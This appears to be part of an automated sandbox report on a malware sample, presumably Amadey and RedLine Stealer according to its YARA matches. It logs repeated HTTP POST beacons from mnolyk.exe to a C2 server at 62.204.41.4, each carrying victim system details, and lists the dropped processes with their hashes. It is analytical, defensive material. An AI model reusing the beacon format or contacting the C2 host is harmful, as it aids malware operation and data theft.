                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:24.016743898 CET200INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:23 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      86192.168.2.74978162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:24.188555956 CET201OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:24.251075029 CET201INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      87192.168.2.74978262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:24.432492018 CET202OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:24.495655060 CET202INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      88192.168.2.74978362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:24.676198006 CET203OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:24.739541054 CET203INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      89192.168.2.74978462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:24.915414095 CET204OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:24.980734110 CET204INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      9192.168.2.74970362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:03.736813068 CET113OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:03.801440954 CET113INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      90192.168.2.74978562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:25.161286116 CET205OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:25.226727962 CET205INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      91192.168.2.74978662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:25.415635109 CET206OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:25.483971119 CET206INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      92192.168.2.74978762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:25.659773111 CET207OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:25.722987890 CET207INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      93192.168.2.74978862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:25.894311905 CET208OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:25.960613012 CET208INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:25 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      94192.168.2.74978962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:26.125134945 CET209OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:26.188009024 CET209INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      95192.168.2.74979062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:26.361222029 CET210OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:26.424854040 CET210INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      96192.168.2.74979162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:26.598223925 CET211OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:26.663130999 CET211INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      97192.168.2.74979262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:26.828356981 CET212OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:26.890578032 CET212INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:26 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      98192.168.2.74979362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:27.063291073 CET213OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:27.125319004 CET213INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      99192.168.2.74979462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:27.299792051 CET214OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:27.364953995 CET214INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:27 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Click to jump to process

                                                                      Click to jump to process

                                                                      Click to dive into process behavior distribution

                                                                      Click to jump to process

                                                                      Target ID:0
                                                                      Start time:23:06:26
                                                                      Start date:07/02/2023
                                                                      Path:C:\Users\user\Desktop\file.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\file.exe
                                                                      Imagebase:0x3d0000
                                                                      File size:538112 bytes
                                                                      MD5 hash:F4B906685385629998FAA352A94A2E1F
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.254673704.0000000004709000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:low

                                                                      Target ID:1
                                                                      Start time:23:06:26
                                                                      Start date:07/02/2023
                                                                      Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\bPsg.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\bPsg.exe
                                                                      Imagebase:0xf30000
                                                                      File size:347136 bytes
                                                                      MD5 hash:F0D05D7896B3839E5CFBCC78E4FD87FF
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 55%, ReversingLabs
                                                                      Reputation:low

                                                                      Target ID:2
                                                                      Start time:23:06:27
                                                                      Start date:07/02/2023
                                                                      Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\aPsf.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\aPsf.exe
                                                                      Imagebase:0x400000
                                                                      File size:251904 bytes
                                                                      MD5 hash:5DD55AE0E5CCD8EF2E82679ED0FC11C9
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.292364966.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000002.00000002.292364966.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: ditekSHen
                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000002.00000002.292530050.00000000006F7000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000003.267977277.0000000000690000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000003.267977277.0000000000690000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 45%, ReversingLabs
                                                                      Reputation:low

                                                                      Target ID:3
                                                                      Start time:23:06:38
                                                                      Start date:07/02/2023
                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                                                                      Imagebase:0x7ff61b080000
                                                                      File size:69632 bytes
                                                                      MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Target ID:7
                                                                      Start time:23:06:45
                                                                      Start date:07/02/2023
                                                                      Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\nika.exe
                                                                      Imagebase:0xd40000
                                                                      File size:11264 bytes
                                                                      MD5 hash:7E93BACBBC33E6652E147E7FE07572A0
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 82%, ReversingLabs
                                                                      Reputation:moderate

                                                                      Target ID:9
                                                                      Start time:23:06:47
                                                                      Start date:07/02/2023
                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\
                                                                      Imagebase:0x7ff61b080000
                                                                      File size:69632 bytes
                                                                      MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Target ID:14
                                                                      Start time:23:06:57
                                                                      Start date:07/02/2023
                                                                      Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\xriv.exe
                                                                      Imagebase:0x1200000
                                                                      File size:241664 bytes
                                                                      MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
